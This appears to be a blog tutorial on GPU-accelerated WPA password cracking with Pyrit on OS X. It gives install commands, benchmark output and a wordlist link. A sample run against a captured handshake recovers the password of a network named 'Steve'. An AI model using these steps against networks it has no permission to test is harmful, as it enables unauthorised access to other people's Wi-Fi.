Cracking the WPA password with aircrack is not fast, especially in a VM. So the first thing is to do the cracking outside of BackTrack. We have to get the .cap file out of the VM. Just drag it from the VM to the desktop.
Also using just the CPU is slow. GPUs these days can crack faster than the CPU.
X Code Command Line tools only
OS X Mountain Lion comes with OpenCL tools. X Code is big and most of it is iOS and OS X dev tools which we don't need. So only Command Line Tools can be installed. You have to have an Apple developer account to download it (it's free):
Then:
Click Next or Continue or whatever until it is done.
or X Code (full version)
Full X Code can be installed from the App Store:
Then Command Line Tools have to be installed. Go to XCode, then Properties:
Install Pyrit (AMD Radeon)
Pyrit is a python tool that cracks WPA passwords.
Prerequisites. Download these in a folder named PYRIT for example:
http://libdnet.googlecode.com/files/libdnet-1.12.tgz
http://dfn.dl.sourceforge.net/sourceforge/pylibpcap/pylibpcap-0.6.4.tar.gz
http://www.secdev.org/projects/scapy/files/scapy-latest.tar.gz
Then in the folder in terminal do:
tar -xzf libdnet-1.12.tgz cd libdnet-1.12 ./configure make sudo make install cd python sudo python setup.py install cd ../.. tar -xzf pylibpcap-0.6.4.tar.gz cd pylibpcap-0.6.4 sudo python setup.py install cd .. tar -xzf scapy-latest.tar.gz cd scapy-2.1.0 sudo python setup.py install cd .. |
Now, it's time for the pyrit tool:
svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit-read-only cd pyrit-read-only cd pyrit sudo python setup.py install |
Install Pyrit (NVidia)
Extra steps for NVidia:
Download nvidia driver from http://developer.nvidia.com/cuda/cuda-downloads.
If you don't have nvidia driver, you'll get: SystemError: Nvidia's CUDA-compiler 'nvcc' can't be found.
Check the first and second option:
Then:
cd .. cd .. cd pyrit-read-only cd cpyrit_cuda sudo LDFLAGS=-L/usr/local/cuda/lib python setup.py install |
Test Pyrit
On a macbook with ATI we get something like:
$ pyrit list_cores Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ The following cores seem available... #1: 'OpenCL-Device 'ATI Radeon HD 6750M'' #2: 'CPU-Core (SSE2/AES)' #3: 'CPU-Core (SSE2/AES)' #4: 'CPU-Core (SSE2/AES)' #5: 'CPU-Core (SSE2/AES)' #6: 'CPU-Core (SSE2/AES)' #7: 'CPU-Core (SSE2/AES)' #8: 'CPU-Core (SSE2/AES)' |
On a macbook with nVidia, we get something like:
$ pyrit list_cores Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ The following cores seem available... #1: 'CUDA-Device #1 'GeForce 9400M'' #2: 'CPU-Core (SSE2)' |
Note: I have no idea why when OpenCL or CUDA is installed it takes the place of one of the cores, on a quad-core we get 7 cores with OpenCL. When benchmarking it seems all cores are being utilized. I guess it's a bug.
Benchmarking
$ pyrit benchmark Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ Running benchmark (7724.0 PMKs/s)... - Computed 7723.98 PMKs/s total. #1: 'OpenCL-Device 'ATI Radeon HD 6750M'': 7180.7 PMKs/s (RTT 2.7) #2: 'CPU-Core (SSE2/AES)': 252.6 PMKs/s (RTT 3.8) #3: 'CPU-Core (SSE2/AES)': 247.2 PMKs/s (RTT 3.9) #4: 'CPU-Core (SSE2/AES)': 243.6 PMKs/s (RTT 4.0) #5: 'CPU-Core (SSE2/AES)': 246.6 PMKs/s (RTT 3.9) #6: 'CPU-Core (SSE2/AES)': 250.8 PMKs/s (RTT 3.8) #7: 'CPU-Core (SSE2/AES)': 253.0 PMKs/s (RTT 3.8) #8: 'CPU-Core (SSE2/AES)': 250.4 PMKs/s (RTT 3.9) |
You can see that the GPU is faster than 7 cores (they should be 8, i don't know why one is missing)
Wordlists
Wordlists can be found here: http://blog.g0tmi1k.com/2011/06/dictionaries-wordlists.html
gfxCardStatus
Make sure you're in Discrete Only mode.
Otherwise pyrit will complain:
Exception in thread OpenCL-Device 'ATI Radeon HD 6750M': [...] SystemError: Failed to create command-queue (CL_INVALID_VALUE) [...] SystemError: The core 'OpenCL-Device 'ATI Radeon HD 6750M'' has died unexpectedly |
Cracking with Pyrit
$ pyrit -r ~/Steve-01.cap --all-handshakes -i ~/WORDLISTS/4.9gb/BIG-WPA-LIST-1.txt attack_passthrough Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ Parsing file '/Users/c00l/Desktop/Steve-01.cap' (1/1)... Parsed 3539 packets (3539 802.11-packets), got 115 AP(s) Picked AccessPoint 00:0f:01:37:1a:a0 ('Steve') automatically. Attacking 20 handshake(s). Tried 140007 PMKs so far; 7550 PMKs per second. The password is 'forzajuve'. |
--all-handshakes means that all handshakes in the file will be used together.
It will utilize the CPU and the GPU simultaneously. And now we get around 10k attempts/sec which is a lot better than aircrack-ng in a vm.
Note: your computer will unresponsive, make sure anything CPU or GPU intensive is switched off.
Some stuff was taken from here.
Check the wifis category for more tutorials.